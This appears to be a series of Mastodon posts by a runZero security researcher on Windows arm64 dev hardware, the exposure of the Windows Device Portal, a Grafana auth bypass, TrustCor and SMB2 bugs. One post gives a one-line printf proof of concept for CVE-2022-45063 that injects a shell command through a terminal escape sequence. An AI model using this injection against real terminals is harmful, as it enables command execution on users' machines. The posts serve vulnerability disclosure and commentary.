Meet my two Windows arm64 devices for @runZeroInc – on the left we have the snazzy new Windows Dev Kit 2023 ($599 USD), on the right we have a Pi 400 ($100+ USD).

My company’s (@runZeroInc) first request for arm64 support on Windows was almost two years ago and the only reasonably priced hardware that could run Windows 10+ was the Raspberry Pi 400 (and Raspberry Pi 4 4GB+ models). Installing Windows on these Raspberry Pis required various backflips and dodgy drivers to use more than 3Gb of RAM. The result was a laggy desktop, but something that was technically functional, thanks to npcap support for arm64 from Insecure, LLC.

Fast forward to Q4 2022 – serious hardware for arm64! The Windows Dev Kit 2023 includes 32Gb of RAM, 512Gb of NVMe, and a solid processor. The desktop is at least better than most Celerons and the memory support makes this usable for development. The downside, currently, is price, and we hope that arm64 options for Windows will improve going forward. The dev kit is much less painful to use than the jenky Windows support for the Pis, but support for Windows 11 also highlights another interesting (and security-relevant) service: the Windows Device Portal.

The Windows Device Portal is an optional service available after enabling developer settings. The service provides a web interface for remote management, with optional authentication, and provides everything an attacker could ask for (including remote process dumps of lsass.exe).

This service runs on TCP 50080 (HTTP) and 50443 (HTTPS), and while you are only likely to find it on development systems, any Windows 11 administrator can enable it. The bad news: with optional authentication, this service is effectively unauthenticated remote system access, with the benefit of using signed binaries. The good news is that it should be rare, and even the lame static username and password configuration (unrelated to Windows authentication), can prevent casual network abuse. We plan to add support for detection of this service in the next build of runZero all the same.

Thanks for reading (and the warm welcome to Mastodon)!

Terminal emulation bugs are the best: https://www.openwall.com/lists/oss-security/2022/11/10/1

printf "\e]50;i\$(touch /tmp/hack-like-its-1999)\a\e]50;?\a" > cve-2022-45063

Yesterday's Grafana authentication bypass vulnerability (CVE-2022-39328) is really neat from the perspective of auditing Go code. Concurrent requests could accidentally share the same array slice of middleware handlers. Advisory at https://grafana.com/blog/2022/11/08/security-release-new-versions-of-grafana-with-critical-and-moderate-fixes-for-cve-2022-39328-cve-2022-39307-and-cve-2022-39306/ and actual patch diff at https://github.com/grafana/grafana/pull/58458/files

Some scary reporting from @joesephmenn@twitter.com via The Post: One of the powerful root certificate authorities trusted by big web browsers to vouch for websites operates from a UPS Store address and has ties to a U.S. intelligence contractor selling interception gear: https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/ #TrustCor #TLS

some (lol) 0-day for fun; we accidentally dropped some big bugs in https://www.runzero.com/blog/smb2-sessions/ .. 2 years - but apple is now patching it, so it's ok (and don't mind samba or windows)